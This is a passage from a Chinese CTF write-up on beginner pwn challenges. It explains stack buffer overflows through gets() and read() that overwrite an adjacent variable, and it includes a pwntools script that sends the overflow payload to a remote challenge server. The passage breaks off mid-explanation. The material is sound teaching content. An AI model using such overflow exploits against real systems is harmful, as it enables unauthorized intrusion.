1、CGfsb:https://blog.csdn.net/zz_Caleb/article/details/88980866
2、when_did_you_born(简单的ROP)
下载文件,是一个64位的elf文件,放到ida中看伪码,报错:
搜了一下这个问题,是栈的问题,可以通过修改一些设置来解决,但是,找到了main函数:
在这个地方查看伪码不会报错,而且主函数的源码可以得到:
分析一下伪码,v5==1926会让我们拿到flag,但是,前面对v5进行了过滤,所以我们再输入的时候就不能把v5的值输成1926,那怎么办呢?我们看到最前面给出了v4和v5的位置:
char v4; // [rsp+0h] [rbp-20h]
unsigned int v5; // [rsp+8h] [rbp-18h]
所以v5比v4的地址大了8位,而在输入v4的时候用的是gets函数,不会对输入的字符串长度进行限制,所以我们可以利用变量的溢出,将溢出的数据覆盖v5使v5的值为1926,构造payload = "A"*8 + p32(1926)即可。
下面给出脚本:
from pwn import *
p = remote('111.198.29.45', 31788)
p.sendlineafter('Birth?\n', '1998')
payload = 'AAAAAAAA' + p32(1926)
p.sendlineafter('Name?\n', payload)
print(p.recvall())
运行结果:
4、hello_pwn
64位elf文件,ida查看伪码:
看一下这个sub_400686()函数:
所以我们的目标就是让dword_60106C == 1853186401,read(0, &unk_601068, 0x10uLL)是将键盘输入的数据存储到unk_601068中,我们看一下unk_601068的位置发现unk_601068和dword_60106C 的位置只相差4:
我们可以对unk_601068进行输入,而且这里也是不限定输入长度的,所以我们可以输入unk_601068使其溢出来把1853186